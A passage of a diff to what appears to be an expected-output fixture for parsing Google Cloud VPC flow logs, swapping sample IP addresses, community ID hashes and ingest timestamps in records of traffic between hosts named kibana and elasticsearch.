"{\"insertId\":\"19im82tfdygzn6\",\"jsonPayload\":{\"bytes_sent\":\"183366\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392125800Z", + "original": "{\"insertId\":\"19im82tfdygzn6\",\"jsonPayload\":{\"bytes_sent\":\"183366\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -17220,18 +17220,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 185295, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 244 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:F2vkpY9ubcm/3+J6iCqgHtizLiU=", + "community_id": "1:yhUOdMY4PRkYtxw6pyH0V3578CI=", "bytes": 185295, "name": "default", "transport": "tcp", @@ -17253,7 +17253,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -17290,8 +17290,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869064200Z", - "original": "{\"insertId\":\"19im82tfdygznk\",\"jsonPayload\":{\"bytes_sent\":\"185295\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392130200Z", + "original": "{\"insertId\":\"19im82tfdygznk\",\"jsonPayload\":{\"bytes_sent\":\"185295\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:49.549471457Z", @@ -17320,17 +17320,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 49438, "bytes": 68961, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 711 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:XQBVj/qvQirewgJk7seie1WKY/s=", + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", "bytes": 68961, "transport": "tcp", "type": "ipv4", @@ -17344,7 +17344,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -17369,8 +17369,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869067200Z", - "original": "{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392134Z", + "original": "{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.398463104Z", "end": "2019-06-14T03:49:56.220725956Z", @@ -17391,10 +17391,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17408,7 +17408,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uLseEqRu8Dul5leogDK11gQV06U=", + "community_id": "1:NkGfacExXrlt+hMyCxxaT2CdDeM=", "bytes": 62072, "name": "default", "transport": "tcp", @@ -17431,7 +17431,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -17467,8 +17467,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869070100Z", - "original": "{\"insertId\":\"19im82tfdygzob\",\"jsonPayload\":{\"bytes_sent\":\"62072\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392138Z", + "original": "{\"insertId\":\"19im82tfdygzob\",\"jsonPayload\":{\"bytes_sent\":\"62072\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -17495,18 +17495,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 198326, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:m09Xemo/1QRUmAThg0ZtnVcAeS8=", + "community_id": "1:KsEQeDpJJQzBIT7y9/jnqOdwYak=", "bytes": 198326, "name": "default", "transport": "tcp", @@ -17528,7 +17528,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -17565,8 +17565,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869073Z", - "original": "{\"insertId\":\"19im82tfdygznc\",\"jsonPayload\":{\"bytes_sent\":\"198326\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392142100Z", + "original": "{\"insertId\":\"19im82tfdygznc\",\"jsonPayload\":{\"bytes_sent\":\"198326\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -17587,10 +17587,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17604,7 +17604,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0T9pXVTCUZ37bK4xUSfPnYkUcHk=", + "community_id": "1:B/prlGvm/LDkdDcuN85b0JOuzto=", "bytes": 61436, "name": "default", "transport": "tcp", @@ -17627,7 +17627,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -17663,8 +17663,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869075700Z", - "original": "{\"insertId\":\"19im82tfdygznj\",\"jsonPayload\":{\"bytes_sent\":\"61436\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392145500Z", + "original": "{\"insertId\":\"19im82tfdygznj\",\"jsonPayload\":{\"bytes_sent\":\"61436\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -17685,10 +17685,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17702,7 +17702,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:nOR2MzlGdRdAPthTbrK2arYttrs=", + "community_id": "1:rnN2XV4CYsUrxmk67rUeU4blQzU=", "bytes": 66791, "name": "default", "transport": "tcp", @@ -17725,7 +17725,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -17761,8 +17761,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869078600Z", - "original": "{\"insertId\":\"19im82tfdygzo5\",\"jsonPayload\":{\"bytes_sent\":\"66791\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"355\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392149800Z", + "original": "{\"insertId\":\"19im82tfdygzo5\",\"jsonPayload\":{\"bytes_sent\":\"66791\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"355\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -17789,17 +17789,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 54812, "bytes": 1457, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:iNSkH+XbFsPOGDVjlyGh+11nIrk=", + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -17813,7 +17813,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -17838,8 +17838,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869081400Z", - "original": "{\"insertId\":\"19im82tfdygzod\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":54812},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392155400Z", + "original": "{\"insertId\":\"19im82tfdygzod\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":54812},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", "end": "2019-06-14T03:45:20.708994883Z", @@ -17860,10 +17860,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -17877,7 +17877,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:F2vkpY9ubcm/3+J6iCqgHtizLiU=", + "community_id": "1:yhUOdMY4PRkYtxw6pyH0V3578CI=", "bytes": 64466, "name": "default", "transport": "tcp", @@ -17900,7 +17900,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -17936,8 +17936,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869084300Z", - "original": 